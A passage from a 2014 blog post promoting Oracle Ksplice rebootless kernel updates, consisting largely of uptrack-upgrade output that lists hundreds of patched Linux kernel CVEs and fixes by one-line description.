Installing [m4x7vdnl] CVE-2012-2390: Memory leak in hugetlbfs mmap() failure.
Installing [o2a3jmox] CVE-2012-2313: Privilege escalation in the dl2k NIC.
Installing [u3qpyl86] CVE-2012-3430: kernel information leak in RDS sockets.
Installing [wr1of5oe] CVE-2012-3552: Denial-of-service in IP options handling.
Installing [y40wlmcw] CVE-2012-3412: Remote denial of service through TCP MSS option in SFC NIC.
Installing [dxshabnc] Use-after-free in USB.
Installing [aovf4isj] Race condition in SUNRPC.
Installing [trz9wa6p] CVE-2012-3400: Buffer overflow in UDF parsing.
Installing [062ge0uf] CVE-2012-3511: Use-after-free due to race condition in madvise.
Installing [tu585kp5] CVE-2012-1568: A predictable base address with shared libraries and ASLR.
Installing [fky5li3t] CVE-2012-2133: Use-after-free in hugetlbfs quota handling.
Installing [xtpg99y6] CVE-2012-5517: NULL pointer dereference in memory hotplug.
Installing [ffehzdo8] CVE-2012-4444: Prohibit reassembling IPv6 fragments when some data overlaps.
Installing [u0d6ztl3] CVE-2012-4565: Divide by zero in TCP congestion control Algorithm.
Installing [7au7wp12] CVE-2012-2100: Divide-by-zero mounting an ext4 filesystem.
Installing [80vrmgyk] CVE-2012-4530: Kernel information leak in binfmt execution.
Installing [uytq1dk0] CVE-2012-4398: Denial-of-service in kernel module loading.
Installing [3c5erej0] CVE-2013-0310: NULL pointer dereference in CIPSO socket options.
Installing [j8x8j89y] CVE-2013-0311: Privilege escalation in vhost descriptor management.
Installing [mkibg12j] CVE-2012-4508: Stale data exposure in ext4.
Installing [daw7s3mo] CVE-2012-4542: SCSI command filter does not restrict access to read-only devices.
Installing [nqlo7yy2] CVE-2013-0871: Privilege escalation in PTRACE_SETREGS.
Installing [l6zf9mec] CVE-2013-0268: /dev/cpu/*/msr local privilege escalation.
Installing [r88p6prz] CVE-2013-1798: Information leak in KVM APIC driver.
Installing [tquaqo7o] CVE-2013-1792: Denial-of-service in user keyring management.
Installing [ao71x17l] CVE-2012-6537: Kernel information leaks in network transformation subsystem.
Installing [875umolk] CVE-2013-1826: NULL pointer dereference in XFRM buffer size mismatch.
Installing [4dr93r2j] CVE-2013-1827: Denial-of-service in DCCP socket options.
Installing [cdrfdlrt] CVE-2013-0349: Kernel information leak in Bluetooth HIDP support.
Installing [9j8xk8dz] CVE-2012-6546: Information leak in ATM sockets.
Installing [4oeurjvw] CVE-2013-1767: Use-after-free in tmpfs mempolicy remount.
Installing [yhprsmoc] CVE-2013-1773: Heap buffer overflow in VFAT Unicode handling.
Installing [amh400jp] CVE-2012-6547: Kernel stack leak from TUN ioctls.
Installing [532069fc] CVE-2013-1774: NULL pointer dereference in USB Inside Out Edgeport serial driver.
Installing [uaslykxk] CVE-2013-2017: Double free in Virtual Ethernet Tunnel driver (veth).
Installing [1vegmzxj] CVE-2013-1943: Local privilege escalation in KVM memory mappings.
Installing [wddz9qxt] CVE-2012-6548: Information leak in UDF export.
Installing [d51dm2vs] CVE-2013-0914: Information leak in signal handlers.
Installing [sxb5x0pd] CVE-2013-2852: Invalid format string usage in Broadcom B43 wireless driver.
Installing [vzlh2p9r] CVE-2013-3222: Kernel stack information leak in ATM sockets.
Installing [l1wlz1f1] CVE-2013-3224: Kernel stack information leak in Bluetooth sockets.
Installing [m0y7j4ra] CVE-2013-3225: Kernel stack information leak in Bluetooth rfcomm.
Installing [3m5ckvvm] CVE-2013-3301: NULL pointer dereference in tracing sysfs files.
Installing [o44ucnfs] CVE-2013-2634, 2635: Kernel leak in data center bridging and netlink.
Installing [0m3a5xq8] CVE-2013-2128: Denial of service in TCP splice.
Installing [2fg4nowt] CVE-2013-2232: Memory corruption in IPv6 routing cache.
Installing [m4a0xb93] CVE-2012-6544: Information leak in Bluetooth L2CAP socket name.
Installing [pqfoprcp] CVE-2013-2237: Information leak on IPSec key socket.
Installing [i1ha5yp7] CVE-2013-4162: Denial-of-service with IPv6 sockets with UDP_CORK.
Installing [aqfegdn1] CVE-2013-4299: Information leak in device mapper persistent snapshots.
Installing [oojymn3l] CVE-2013-4387: Memory corruption in IPv6 UDP fragmentation offload.
Installing [kb7zovzd] CVE-2013-0343: Denial of service in IPv6 privacy extensions.
Installing [7ew8svwd] Off-by-one error causes reduced entropy in kernel PRNG.
Installing [v3hs5diu] CVE-2013-2888: Memory corruption in Human Input Device processing.
Installing [aew2tmdl] CVE-2013-2889: Memory corruption in Zeroplus HID driver.
Installing [ox2wqeva] CVE-2012-6545: Information leak in Bluetooth RFCOMM socket name.
Installing [w9rhkfub] CVE-2013-1928: Kernel information leak in compat_ioctl/VIDEO_SET_SPU_PALETTE.
Installing [r55nqyci] CVE-2013-2164: Kernel information leak in the CDROM driver.
Installing [1vgf62zi] CVE-2013-2234: Information leak in IPsec key management.
Installing [hc532irb] CVE-2013-2851: Format string vulnerability is software RAID device names.
Installing [e129vh8h] CVE-2013-4592: Denial-of-service in KVM IOMMU mappings.
Installing [9wzwcaep] CVE-2013-2141: Information leak in tkill() and tgkill() system calls.
Installing [ufm8ladu] CVE-2013-4470: Memory corruption in IPv4 and IPv6 networking corking with UFO.
Installing [5rh9jkmi] CVE-2013-6367: Divide-by-zero in KVM LAPIC.
Installing [ur8700aj] CVE-2013-6368: Memory corruption in KVM virtual APIC accesses.
Installing [nyg2e0m1] Error in the tag insertion logic of the bonding network device.
Installing [1ekik21n] CVE-2013-2929: Incorrect permissions check in ptrace with dropped privileges.
Installing [m8de4fmg] CVE-2013-7263, CVE-2013-7265: Information leak in IPv4, IPv6 and PhoNet socket recvmsg.
Installing [p4ufjdr0] CVE-2014-0101: NULL pointer dereference in SCTP protocol.
Installing [o86dh6ww] Use-after-free in EDAC Intel E752X driver.
Installing [b2h8hej4] Deadlock in XFS filesystem when removing a inode from namespace.
Installing [nvhmnvp6] Memory leak in GFS2 filesystem for files with short lifespan.
Installing [7brqevk0] CVE-2013-1860: Buffer overflow in Wireless Device Management driver.
Installing [4nh0vuhi] Missing check in selinux for IPSec TCP SYN-ACK packets.
Installing [zvvk1k2q] Logic error in selinux when checking permissions on recv socket.
Installing [2mxh0jvn] CVE-2013-(726[6789], 727[01], 322[89], 3231): Information leaks in recvmsg.
Installing [1r5tw9sm] CVE-2013-6383: Missing capability check in AAC RAID compatibility ioctl.
Installing [z4k7xryp] CVE-2014-2523: Remote crash via DCCP conntrack.
Installing [pi89wa2j] CVE-2014-1737, CVE-2014-1738: Local privilege escalation in floppy ioctl.
Installing [b4x8o44g] CVE-2014-0196: Pseudo TTY device write buffer handling race.
Installing [s8s7tfsm] CVE-2014-3153: Local privilege escalation in futex requeueing.
Installing [bqk9mi1j] CVE-2013-6378: Denial-of-service in Marvell 8xxx Libertas WLAN driver.
Installing [rokmr7ey] CVE-2014-1874: Denial-of-service in SELinux on empty security context.
Installing [hxq9cdju] CVE-2014-0203: Memory corruption on listing procfs symbolic links.
Installing [n6kpf53d] CVE-2014-4699: Privilege escalation in ptrace() RIP modification.
Installing [pbab6ibn] CVE-2014-4943: Privilege escalation in PPP over L2TP setsockopt/getsockopt.
Installing [8n932y6h] CVE-2014-5077: Remote denial-of-service in SCTP on simultaneous connections.
Installing [yfh1rar2] CVE-2014-2678: NULL pointer dereference in RDS protocol when binding.
Installing [5z4hhyp3] CVE-2013-7339: NULL pointer dereference in RDS socket binding.
Installing [1vpc7i76] CVE-2012-6647: NULL pointer dereference in non-pi futexes.
Installing [ruu6bc4r] CVE-2014-3144, CVE-2014-3145: Multiple local denial of service vulnerabilities in netlink.
Installing [hgeqfh2x] CVE-2014-3917: Denial-of-service and information leak in audit syscall subsystem.
Installing [345v5a2z] CVE-2014-4667: Denial-of-service in SCTP stack when unpacking a COOKIE_ECHO chunk.
Installing [92st5y9o] CVE-2014-0205: Use-after-free in futex refcounting.
Your kernel is fully up to date.
Effective kernel version is 2.6.32-431.29.2.el6

real	1m26.960s
user	0m39.562s
sys	0m34.806s
And now, 1min 27seconds for 267 patches. both CVEs and critical fixes...

by wcoekaer at October 15, 2014 09:15 PM

The magic of ksplice

I love talking about Oracle Ksplice and how cool a technology and feature it is. Whenever I explain to customers how much they can do with it, they often just can't believe the capabilities until I show them, in a matter of literally 5 seconds that it actually really -just works-.

During Oracle OpenWorld, we talked about it a lot, of course, and I wanted to show you how far back these ksplice updates can go. How much flexibility it gives a system administrator in terms of which kernel to use, how easy and fast it is, etc...

One of the main advantages of the ksplice technology is the ability for us to build these updates for many, many, yes many,... kernels and have a highly automated and scalable build infrastructure. When we publish a ksplice update, we build the update for -every kernel errata- released since the first kernel for that given major distribution release we started to support. What does this mean? Well, in the case of Oracle Linux 5, we currently support ksplice updates starting with Oracle Linux 5 update 4's kernel. The base-kernel being the Red Hat Compatible kernel : 2.6.18-164.el5 built, Thu Sep 3 04:15:13 EDT 2009. Yes, you read that right, September 2009. So during the lifetime of Oracle Linux 5, starting with that kernel, we publish ksplice updates for every kernel since then to today (and forward, of course). So no matter what errata kernel you are on, since -164, or major Oracle Linux 5 release, ksplice updates released after that date will be available for all those kernels. A simple uptrack-upgrade will take that running version up to the latest updates. While the main focus of the ksplice online updates is around CVEs, we also add critical fixes to it as well, so it's a combination of both.

So back to OL5.4. running uname shows 2.6.18-164.el5. After uptrack-upgrade -y it will say 2.6.18-398.el5 (which by the way is the latest kernel for OL5 for 2.6.18). You can see the output below, you can also see how many 'minutes' it took, without reboot, all current and active right away, and you can follow the timeframe by looking at the year right behind CVE. You will see CVEs from 2009, 2010, 2011, 2012, 2013 and 2014. Completely current.

Now, this can be done on a running system, to install ksplice and start using it, you don't need to reboot, just install the uptrack tools and you're good to go. You can be current with CVEs and critical bugs without rebooting for years. You can be current, even though you run an older update release of Oracle Linux, and you are not required to take new kernels with potentially (in the RHCK case) new features backported, introducing new code beyond just bugfixes, introduce new device drivers, which on a system that's stable, you don't necessarily want or need. So it's always good to update to newer kernels when you get new hardware and you need new device drivers, but for existing stable production systems, you don't really want or need that, nor do you necessarily need to get stuff from new kernels backported into older versions (again, in particular in the RHCK case) which will introduce a lot of change, I will show you a lines of code change in another blog entry. ksplice let's you stick with an older version, yet, anything critical and CVE related will be there for you and this for any errata kernel you start with since, in the OL5 case, update 4... Not just one update earlier, or but any kernel at any point in time.

If you do have periodic scheduled reboots, fine, install the kernel rpms so that the next time you reboot, it boots into the latest kernel, if you want, but you don't have to. You have complete flexibility if and when you need it.

I hope that the output of this and a follow up blog I will do on OL6 as a similar example, shows how scalable this is, how much use this has had, how many updates we have done and can do, how complex these updates are (not just a one liner change in some file) not just a one off for one customer case but scalable. Also, with tons of checks in place so that it works for kernel modules, so that it won't lock up your box, we validate that it's the right kernel, that these updates are safe to apply, etc, etc.. proven, 7+ years old technology. And completely supported by us. You can run your database or middleware software and run uptrack-upgrade while it's up and running and humming along... perfectly OK.

time uptrack-upgrade -y
The following steps will be taken:
Install [v5267zuo] Clear garbage data on the kernel stack when handling signals.
Install [u4puutmx] CVE-2009-2849: NULL pointer dereference in md.
Install [302jzohc] CVE-2009-3286: Incorrect permissions check in NFSv4.
Install [k6oev8o2] CVE-2009-3228: Information leaks in networking systems.
Install [tvbl43gm] CVE-2009-3613: Remote denial of service in r8169 driver.
Install [690q6ok1] CVE-2009-2908: NULL pointer dereference in eCryptfs.
Install [ijp9g555] CVE-2009-3547: NULL pointer dereference opening pipes.
Install [1ala9dhk] CVE-2009-2695: SELinux does not enforce mmap_min_addr sysctl.
Install [5fq3svyl] CVE-2009-3621: Denial of service shutting down abstract-namespace sockets.
Install [bjdsctfo] CVE-2009-3620: NULL pointer dereference in ATI Rage 128 driver.
Install [lzvczyai] CVE-2009-3726: NFSv4: Denial of Service in NFS client.
Install [25vdhdv7] CVE-2009-3612: Information leak in the netlink subsystem.
Install [wmkvlobl] CVE-2007-4567: Remote denial of service in IPv6
Install [ejk1k20m] CVE-2009-4538: Denial of service in e1000e driver.
Install [c5das3zq] CVE-2009-4537: Buffer underflow in r8169 driver.
Install [issxhwza] CVE-2009-4536: Denial of service in e1000 driver.
Install [kyibbr3e] CVE-2009-4141: Local privilege escalation in fasync_helper().
Install [jfp36tzw] CVE-2009-3080: Privilege Escalation in GDT driver.
Install [4746ikud] CVE-2009-4021: Denial of service in fuse_direct_io.
Install [234ls00d] CVE-2009-4020: Buffer overflow mounting corrupted hfs filesystem.
Install [ffi8v0vl] CVE-2009-4272: Remote DOS vulnerabilities in routing hash table.
Install [fesxf892] CVE-2006-6304: Rewrite attack flaw in do_coredump.
Install [43o4k8ow] CVE-2009-4138: NULL pointer dereference flaw in firewire-ohci driver.
Install [9xzs9dxx] Kernel panic in do_wp_page under heavy I/O load.
Install [qdlkztzx] Kernel crash forwarding network traffic.
Install [ufo0resg] CVE-2010-0437: NULL pointer dereference in ip6_dst_lookup_tail.
Install [490guso5] CVE-2010-0007: Missing capabilities check in ebtables module.
Install [zwn5ija2] CVE-2010-0415: Information Leak in sys_move_pages
Install [n8227iv2] CVE-2009-4308: NULL pointer dereference in ext4 decoding EROFS w/o a journal.
Install [988ux06h] CVE-2009-4307: Divide-by-zero mounting an ext4 filesystem.
Install [2jp2pio6] CVE-2010-0727: Denial of Service in GFS2 locking.
Install [xem0m4sg] Floating point state corruption after signal.
Install [bkwy53ji] CVE-2010-1085: Divide-by-zero in Intel HDA driver.
Install [3ulklysv] CVE-2010-0307: Denial of service on amd64
Install [jda1w8ml] CVE-2010-1436: Privilege escalation in GFS2 server
Install [trws48lp] CVE-2010-1087: Oops when truncating a file in NFS
Install [ij72ubb6] CVE-2010-1088: Privilege escalation with automount symlinks
Install [gmqqylxv] CVE-2010-1187: Denial of service in TIPC
Install [3a24ltr0] CVE-2010-0291: Multiple denial of service bugs in mmap and mremap
Install [7mm0u6cz] CVE-2010-1173: Remote denial of service in SCTP
Install [fd1x4988] CVE-2010-0622: Privilege escalation by futex corruption
Install [l5qljcxc] CVE-2010-1437: Privilege escalation in key management
Install [xs69oy0y] CVE-2010-1641: Permission check bypass in GFS2
Install [lgmry5fa] CVE-2010-1084: Privilege escalation in Bluetooth subsystem.
Install [j7m6cafl] CVE-2010-2248: Remote denial of service in CIFS client.
Install [avqwduk3] CVE-2010-2524: False CIFS mount via DNS cache poisoning.
Install [6qplreu2] CVE-2010-2521: Remote buffer overflow in NFSv4 server.
Install [5ohnc2ho] CVE-2010-2226: Read access to write-only files in XFS filesystem.
Install [i5ax6hf4] CVE-2010-2240: Privilege escalation vulnerability in memory management.
Install [50ydcp2k] CVE-2010-3081: Privilege escalation through stack underflow in compat.
Install [59car2zc] CVE-2010-2798: Denial of service in GFS2.
Install [dqjlyw67] CVE-2010-2492: Privilege Escalation in eCryptfs.
Install [5mgd1si0] Improved fix to CVE-2010-1173.
Install [qr5isvgk] CVE-2010-3015: Integer overflow in ext4 filesystem.
Install [sxeo6c33] CVE-2010-1083: Information leak in USB implementation.
Install [mzgdwuwp] CVE-2010-2942: Information leaks in traffic control dump structures.
Install [19jigi5v] CVE-2010-3904: Local privilege escalation vulnerability in RDS sockets.
Install [rg7pe3n8] CVE-2010-3067: Information leak in sys_io_submit.
Install [n3tg4mky] CVE-2010-3078: Information leak in xfs_ioc_fsgetxattr.
Install [s2y6oq9n] CVE-2010-3086: Denial of Service in futex atomic operations.
Install [9subq5sx] CVE-2010-3477: Information leak in tcf_act_police_dump.
Install [x8q709jt] CVE-2010-2963: Kernel memory overwrite in VIDIOCSMICROCODE.
Install [ff1wrijq] Buffer overflow in icmpmsg_put.
Install [4iixzl59] CVE-2010-3432: Remote denial of service vulnerability in SCTP.
Install [7oqt6tqc] CVE-2010-3442: Heap corruption vulnerability in ALSA core.
Install [ittquyax] CVE-2010-3865: Integer overflow in RDS rdma page counting.
Install [0bpdua1b] CVE-2010-3876: Kernel information leak in packet subsystem.
Install [ugjt4w1r] CVE-2010-4083: Kernel information leak in semctl syscall.
Install [n9l81s9q] CVE-2010-4248: Race condition in __exit_signal with multithreaded exec.
Install [68zq0p4d] CVE-2010-4242: NULL pointer dereference in Bluetooth HCI UART driver.
Install [cggc9uy2] CVE-2010-4157: Memory corruption in Intel/ICP RAID driver.
Install [f5ble6od] CVE-2010-3880: Logic error in INET_DIAG bytecode auditing.
Install [gwuiufjq] CVE-2010-3858: Denial of service vulnerability with large argument lists.
Install [usukkznh] Mitigate denial of service attacks with large argument lists.
Install [5tq2ob60] CVE-2010-4161: Deadlock in socket queue subsystem.
Install [oz6k77bm] CVE-2010-3859: Heap overflow vulnerability in TIPC protocol.
Install [uzil3ohn] CVE-2010-3296: Kernel information leak in cxgb driver.
Install [wr9nr8zt] CVE-2010-3877: Kernel information leak in tipc driver.
Install [5wrnhakw] CVE-2010-4073: Kernel information leaks in ipc compat subsystem.
Install [hnbz3ppf] Integer overflow in sys_remap_file_pages.
Install [oxczcczj] CVE-2010-4258: Failure to revert address limit override after oops.
Install [t44v13q4] CVE-2010-4075: Kernel information leak in serial core.
Install [8p4jsino] CVE-2010-4080 and CVE-2010-4081: Information leaks in sound drivers.
Install [3raind7m] CVE-2010-4243: Denial of service due to wrong execve memory accounting.
Install [od2bcdwj] CVE-2010-4158: Kernel information leak in socket filters.
Install [zbxtr4my] CVE-2010-4526: Remote denial of service vulnerability in SCTP.
Install [mscc8dnf] CVE-2010-4655: Information leak in ethtool_get_regs.
Install [8r9231h7] CVE-2010-4249: Local denial of service vulnerability in UNIX sockets.
Install [2lhgep6i] Panic in kfree() due to race condition in acpi_bus_receive_event.
Install [uaypv955] Fix connection timeouts due to shrinking tcp window with window scaling.
Install [7klbps5h] CVE-2010-1188: Use after free bug in tcp_rcv_state_process.
Install [u340317o] CVE-2011-1478: NULL dereference in GRO with promiscuous mode.
Install [ttqhpxux] CVE-2010-4346: mmap_min_addr bypass in install_special_mapping.
Install [ifgdet83] Use-after-free in MPT driver.
Install [2n7dcbk9] CVE-2011-1010: Denial of service parsing malformed Mac OS partition tables.
Install [cy964b8w] CVE-2011-1090: Denial of Service in NFSv4 client.
Install [6e28ii3e] CVE-2011-1079: Missing validation in bnep_sock_ioctl.
Install [gw5pjusn] CVE-2011-1093: Remote Denial of Service in DCCP.
Install [23obo960] CVE-2011-0726: Information leak in /proc/[pid]/stat.
Install [pbxuj96b] CVE-2011-1080, CVE-2011-1170, CVE-2011-1171, CVE-2011-1172: Information leaks in netfilter.
Install [9oepi0rc] Buffer overflow in iptables CLUSTERIP target.
Install [nguvvw6h] CVE-2011-1163: Kernel information leak parsing malformed OSF partition tables.
Install [8v9d3ton] USB Audio regression introduced by CVE-2010-1083 fix.
Install [jz43fdgc] Denial of service in NFS server via reference count leak.
Install [h860edrq] Fix a packet flood when initializing a bridge device without STP.
Install [3xcb5ffu] CVE-2011-1577: Missing boundary checks in GPT partition handling.
Install [wvcxkbxq] CVE-2011-1078: Information leak in Bluetooth sco.
Install [n5a8jgv9] CVE-2011-1494, CVE-2011-1495: Privilege escalation in LSI MPT Fusion SAS 2.0 driver.
Install [3t5fgeqc] CVE-2011-1576: Denial of service with VLAN packets and GRO.
Install [qsvqaynq] CVE-2011-0711: Information leak in XFS filesystem.
Install [m1egxmrj] CVE-2011-1573: Remote denial of service in SCTP.
Install [fexakgig] CVE-2011-1776: Missing validation for GPT partitions.
Install [rrnm0hzm] CVE-2011-0695: Remote denial of service in InfiniBand setup.
Install [c50ijj1f] CVE-2010-4649, CVE-2011-1044: Buffer overflow in InfiniBand uverb handling.
Install [eywxeqve] CVE-2011-1745, CVE-2011-2022: Privilege escalation in AGP subsystem.
Install [u83h3kej] CVE-2011-1746: Integer overflow in agp_allocate_memory.
Install [kcmghb3m] CVE-2011-1593: Denial of service in next_pidmap.
Install [s113zod3] CVE-2011-1182: Missing validation check in signals implementation.
Install [2xn5hnvr] CVE-2011-2213: Denial of service in inet_diag_bc_audit.
Install [fznr6cbr] CVE-2011-2492: Information leak in bluetooth implementation.
Install [nzhpmyaa] CVE-2011-2525: Denial of Service in packet scheduler API
Install [djng1uvs] CVE-2011-2482: Remote denial of service vulnerability in SCTP.
Install [mbg8auhk] CVE-2011-2495: Information leak in /proc/PID/io.
Install [ofrder8l] Hangs using direct I/O with XFS filesystem.
Install [tqkgmwz7] CVE-2011-2491: Local denial of service in NLM subsystem.
Install [wkw7j4ov] CVE-2011-1160: Information leak in tpm driver.
Install [1f4r424i] CVE-2011-1585: Authentication bypass in CIFS.
Install [kr0lofug] CVE-2011-2484: Denial of service in taskstats subsystem.
Install [zm5fxh2c] CVE-2011-2496: Local denial of service in mremap().
Install [4f8zud01] CVE-2009-4067: Buffer overflow in Auerswald usb driver.
Install [qgzezhlj] CVE-2011-2695: Off-by-one errors in the ext4 filesystem.
Install [fy2peril] CVE-2011-2699: Predictable IPv6 fragment identification numbers.
Install [idapn9ej] CVE-2011-2723: Remote denial of service vulnerability in gro.
Install [i1q0saw7] CVE-2011-1833: Information disclosure in eCryptfs.
Install [uqv087lb] CVE-2011-3191: Memory corruption in CIFSFindNext.
Install [drz5ixw2] CVE-2011-3209: Denial of Service in clock implementation.
Install [2zawfk0b] CVE-2011-3188: Weak TCP sequence number generation.
Install [7gkvlyfi] CVE-2011-3363: Remote denial of service in cifs_mount.
Install [8einfy3y] CVE-2011-4110: Null pointer dereference in key subsystem.
Install [w9l57w7p] CVE-2011-1162: Information leak in TPM driver.
Install [hl96s86z] CVE-2011-2494: Information leak in task/process statistics.
Install [5vsbttwa] CVE-2011-2203: Null pointer dereference mounting HFS filesystems.
Install [ycoswcar] CVE-2011-4077: Buffer overflow in xfs_readlink.
Install [rw8qiogc] CVE-2011-4132: Denial of service in Journaling Block Device layer.
Install [erniwich] CVE-2011-4330: Buffer overflow in HFS file name translation logic.
Install [q6rd6uku] CVE-2011-4324: Denial of service vulnerability in NFSv4.
Install [vryc0xqm] CVE-2011-4325: Denial of service in NFS direct-io.
Install [keb8azcn] CVE-2011-4348: Socket locking race in SCTP.
Install [yvevd42a] CVE-2011-1020, CVE-2011-3637: Information leak, DoS in /proc.
Install [thzrtiaw] CVE-2011-4086: Denial of service in journaling block device.
Install [y5efh27f] CVE-2012-0028: Privilege escalation in user-space futexes.
Install [wxdx4x4i] CVE-2011-3638: Disk layout corruption bug in ext4 filesystem.
Install [cd2g2hvz] CVE-2011-4127: KVM privilege escalation through insufficient validation in SG_IO ioctl.
Install [aqo49k28] CVE-2011-1083: Algorithmic denial of service in epoll.
Install [uknrp2eo] Denial of service in filesystem unmounting.
Install [97u6urvt] Soft lockup in USB ACM driver.
Install [01uynm3o] CVE-2012-1583: use-after-free in IPv6 tunneling.
Install [loizuvxu] Kernel crash in Ethernet bridging netfilter module.
Install [yc146ytc] Unresponsive I/O using QLA2XXX driver.
Install [t92tukl1] CVE-2012-2136: Privilege escalation in TUN/TAP virtual device.
Install [aldzpxho] CVE-2012-3375: Denial of service due to epoll resource leak in error path.
Install [bvoz27gv] Arithmetic overflow in clock source calculations.
Install [lzwurn1u] ext4 filesystem corruption on fallocate.
Install [o9b62qf6] CVE-2012-2313: Privilege escalation in the dl2k NIC.
Install [9do532u6] Kernel panic when overcommiting memory with NFSd.
Install [zf95qrnx] CVE-2012-2319: Buffer overflow mounting corrupted hfs filesystem.
Install [fx2rxv2q] CVE-2012-3430: kernel information leak in RDS sockets.
Install [wo638apk] CVE-2012-2100: Divide-by-zero mounting an ext4 filesystem.
Install [ivl1wsvt] CVE-2012-2372: Denial of service in Reliable Datagram Sockets protocol.
Install [xl2q6gwk] CVE-2012-3552: Denial-of-service in IP options handling.
Install [l093jvcl] Kernel panic in SMB extended attributes.
Install [qlzoyvty] Kernel panic in ext3 indirect blocks.
Install [8lj9n3i6] CVE-2012-1568: A predictable base address with shared libraries and ASLR.
Install [qn1rqea3] CVE-2012-4444: Prohibit reassembling IPv6 fragments when some data overlaps.
Install [wed7w5th] CVE-2012-3400: Buffer overflow in UDF parsing.
Install [n2dqx9n3] CVE-2013-0268: /dev/cpu/*/msr local privilege escalation.
Install [p8oacpis] CVE-2013-0871: Privilege escalation in PTRACE_SETREGS.
Install [cbdr6azh] CVE-2012-6537: Kernel information leaks in network transformation subsystem.
Install [1qz0f4lv] CVE-2013-1826: NULL pointer dereference in XFRM buffer size mismatch.
Install [s0q68mb1] CVE-2012-6547: Kernel stack leak from TUN ioctls.
Install [s1c6y3ee] CVE-2012-6546: Information leak in ATM sockets.
Install [2zzz6cqb] Data corruption on NFSv3/v2 short reads.
Install [kfav9h9d] CVE-2012-6545: Information leak in Bluetooth RFCOMM socket name.
Install [coeq937e] CVE-2013-3222: Kernel stack information leak in ATM sockets.
Install [43shl6vr] CVE-2013-3224: Kernel stack information leak in Bluetooth sockets.
Install [whoojewf] CVE-2013-3235: Kernel stack information leak in TIPC protocol.
Install [7vap7ys6] CVE-2012-6544: Information leak in Bluetooth L2CAP socket name.
Install [0xjd0c1r] CVE-2013-0914: Information leak in signal handlers.
Install [l2925frf] CVE-2013-2147: Kernel memory leak in Compaq Smart Array controllers.
Install [lt4qe1dr] CVE-2013-2164: Kernel information leak in the CDROM driver.
Install [7fkc8czu] CVE-2013-2234: Information leak in IPsec key management.
Install [0t3omxv5] CVE-2013-2237: Information leak on IPSec key socket.
Install [e1jtiocl] CVE-2013-2232: Memory corruption in IPv6 routing cache.
Install [f0bqnvc1] CVE-2013-2206: NULL pointer dereference in SCTP duplicate cookie handling.
Install [v188ww9y] CVE-2013-2141: Information leak in tkill() and tgkill() system calls.
Install [0amslrok] CVE-2013-4162: Denial-of-service with IPv6 sockets with UDP_CORK.
Install [s4w6qq7g] CVE-2012-3511: Use-after-free due to race condition in madvise.
Install [kvnlhbh1] CVE-2012-4398: Denial-of-service in kernel module loading.
Install [k77237db] CVE-2013-4299: Information leak in device mapper persistent snapshots.
Install [ekv19fgd] CVE-2013-4345: Off-by-one in the ANSI Crypto RNG.
Install [pl4pqen7] CVE-2013-0343: Denial of service in IPv6 privacy extensions.
Install [ku36xnjx] Incorrect handling of SCSI scatter-gather list mapping failures.
Install [9jc4vajb] CVE-2013-6383: Missing capability check in AAC RAID compatibility ioctl.
Install [66nk6gwh] CVE-2013-2929: Incorrect permissions check in ptrace with dropped privileges.
Install [1vays5jg] CVE-2013-7263: Information leak in IPv4 and IPv6 socket recvmsg.
Install [g8wy6r2k] CVE-2013-4483: Denial-of-service in IPC subsystem when taking a reference count.
Install [617yrxdl] CVE-2012-6638: Denial-of-service in TCP's SYN+FIN messages.
Install [pp6j74s7] CVE-2013-2888: Kernel memory corruption flaw via oversize HID report id.
Install [pz65qqpk] Panic in GFS2 filesystem locking code.
Install [p4focqhi] CVE-2014-1737, CVE-2014-1738: Local privilege escalation in floppy ioctl.
Install [6w9u3383] CVE-2013-7339: NULL pointer dereference in RDS socket binding.
Install [xqpvy7zh] CVE-2014-4699: Privilege escalation in ptrace() RIP modification.
Install [ghkc42rj] CVE-2014-2678: NULL pointer dereference in RDS protocol when binding.
Install [g4qbxm30] CVE-2014-3917: Denial-of-service and information leak in audit syscall subsystem.
Install [eit799o3] Memory leak in GFS2 filesystem for files with short lifespan.
Installing [v5267zuo] Clear garbage data on the kernel stack when handling signals.
Installing [u4puutmx] CVE-2009-2849: NULL pointer dereference in md.
Installing [302jzohc] CVE-2009-3286: Incorrect permissions check in NFSv4.
Installing [k6oev8o2] CVE-2009-3228: Information leaks in networking systems.
Installing [tvbl43gm] CVE-2009-3613: Remote denial of service in r8169 driver.
Installing [690q6ok1] CVE-2009-2908: NULL pointer dereference in eCryptfs.
Installing [ijp9g555] CVE-2009-3547: NULL pointer dereference opening pipes.
Installing [1ala9dhk] CVE-2009-2695: SELinux does not enforce mmap_min_addr sysctl.
Installing [5fq3svyl] CVE-2009-3621: Denial of service shutting down abstract-namespace sockets.
Installing [bjdsctfo] CVE-2009-3620: NULL pointer dereference in ATI Rage 128 driver.
Installing [lzvczyai] CVE-2009-3726: NFSv4: Denial of Service in NFS client.
Installing [25vdhdv7] CVE-2009-3612: Information leak in the netlink subsystem.
Installing [wmkvlobl] CVE-2007-4567: Remote denial of service in IPv6
Installing [ejk1k20m] CVE-2009-4538: Denial of service in e1000e driver.
Installing [c5das3zq] CVE-2009-4537: Buffer underflow in r8169 driver.
Installing [issxhwza] CVE-2009-4536: Denial of service in e1000 driver.
Installing [kyibbr3e] CVE-2009-4141: Local privilege escalation in fasync_helper().
Installing [jfp36tzw] CVE-2009-3080: Privilege Escalation in GDT driver.
Installing [4746ikud] CVE-2009-4021: Denial of service in fuse_direct_io.
Installing [234ls00d] CVE-2009-4020: Buffer overflow mounting corrupted hfs filesystem.
Installing [ffi8v0vl] CVE-2009-4272: Remote DOS vulnerabilities in routing hash table.
Installing [fesxf892] CVE-2006-6304: Rewrite attack flaw in do_coredump.
Installing [43o4k8ow] CVE-2009-4138: NULL pointer dereference flaw in firewire-ohci driver.
Installing [9xzs9dxx] Kernel panic in do_wp_page under heavy I/O load.
Installing [qdlkztzx] Kernel crash forwarding network traffic.
Installing [ufo0resg] CVE-2010-0437: NULL pointer dereference in ip6_dst_lookup_tail.
Installing [490guso5] CVE-2010-0007: Missing capabilities check in ebtables module.
Installing [zwn5ija2] CVE-2010-0415: Information Leak in sys_move_pages
Installing [n8227iv2] CVE-2009-4308: NULL pointer dereference in ext4 decoding EROFS w/o a journal.
Installing [988ux06h] CVE-2009-4307: Divide-by-zero mounting an ext4 filesystem.
Installing [2jp2pio6] CVE-2010-0727: Denial of Service in GFS2 locking.
Installing [xem0m4sg] Floating point state corruption after signal.
Installing [bkwy53ji] CVE-2010-1085: Divide-by-zero in Intel HDA driver.
Installing [3ulklysv] CVE-2010-0307: Denial of service on amd64
Installing [jda1w8ml] CVE-2010-1436: Privilege escalation in GFS2 server
Installing [trws48lp] CVE-2010-1087: Oops when truncating a file in NFS
Installing [ij72ubb6] CVE-2010-1088: Privilege escalation with automount symlinks
